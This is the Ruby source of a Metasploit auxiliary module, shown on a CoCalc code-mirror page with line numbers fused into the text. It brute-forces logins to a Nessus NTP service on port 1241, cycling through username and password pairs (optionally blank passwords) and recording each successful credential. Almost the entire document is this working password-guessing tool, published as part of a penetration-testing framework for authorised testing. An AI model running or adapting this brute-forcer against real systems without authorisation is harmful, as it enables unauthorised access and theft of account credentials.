CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
Views: 1904
##1# nessus_ntp_login.rb2##34# This module requires Metasploit: https://metasploit.com/download5# Current source: https://github.com/rapid7/metasploit-framework6##78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::Tcp10include Msf::Auxiliary::Scanner11include Msf::Auxiliary::Report12include Msf::Auxiliary::AuthBrute1314def initialize15super(16'Name' => 'Nessus NTP Login Utility',17'Description' => 'This module attempts to authenticate to a Nessus NTP service.',18'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],19'License' => MSF_LICENSE20)21register_options(22[23Opt::RPORT(1241),24OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")25]26)27end2829def run_host(ip)30begin31print_status("#{msg} Connecting and checking username and passwords")32each_user_pass do |user, pass|33do_login(user, pass)34end35end36rescue ::Rex::ConnectionError37rescue ::Exception => e38vprint_error("#{msg} #{e.to_s} #{e.backtrace}")39end4041def ntp_send(data=nil, con=true)42begin43@result=''44@coderesult=''45if (con)46@connected=false47connect48select(nil,nil,nil,0.4)49end50@connected=true51sock.put(data)52@result=sock.get_once53rescue ::Exception => err54print_error("#{msg} Error: #{err.to_s}")55end56end5758def report_cred(opts)59service_data = {60address: opts[:ip],61port: opts[:port],62service_name: opts[:service_name],63protocol: 'tcp',64workspace_id: myworkspace_id65}6667credential_data = {68origin_type: :service,69module_fullname: fullname,70username: opts[:user],71private_data: opts[:password],72private_type: :password73}.merge(service_data)7475login_data = {76last_attempted_at: Time.now,77core: create_credential(credential_data),78status: Metasploit::Model::Login::Status::SUCCESSFUL,79proof: opts[:proof]80}.merge(service_data)8182create_credential_login(login_data)83end8485def do_login(user=nil,pass=nil)86begin87ntp_send("< NTP/1.0 >\n",true) # send hello88if @result !~ /\<\ NTP\/1\.0 \>/89print_error("#{msg} Nessus NTP does not appear to be running: did not get response to NTP hello: #{@result}")90return :abort91end9293vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")94ntp_send(nil,!@connected)95if @result !~ /User\ \:/96print_error("#{msg} Nessus NTP did not send User request: #{@result}")97end98ntp_send("#{user}\n",!@connected)99if @result !~ /Password\ \:/100print_error("#{msg} Nessus NTP did not send Password request: #{@result}")101end102ntp_send("#{pass}\n",!@connected)103if @result =~ /SERVER <|>.*<|> SERVER/is104print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")105report_cred(106ip: rhost,107port: rport,108service_name: 'nessus-ntp',109user: user,110password: pass,111proof: @result112)113114disconnect115@connected = false116return :next_user117else118if (@connected)119disconnect # Sometime nessus disconnect the client after wrongs attempts120@connected = false121end122vprint_error("#{msg} Rejected user: '#{user}' with password: '#{pass}': #{@result}")123return :fail124end125rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout126rescue ::Timeout::Error, ::Errno::EPIPE127end128end129130def msg131"#{rhost}:#{rport} Nessus NTP -"132end133end134135136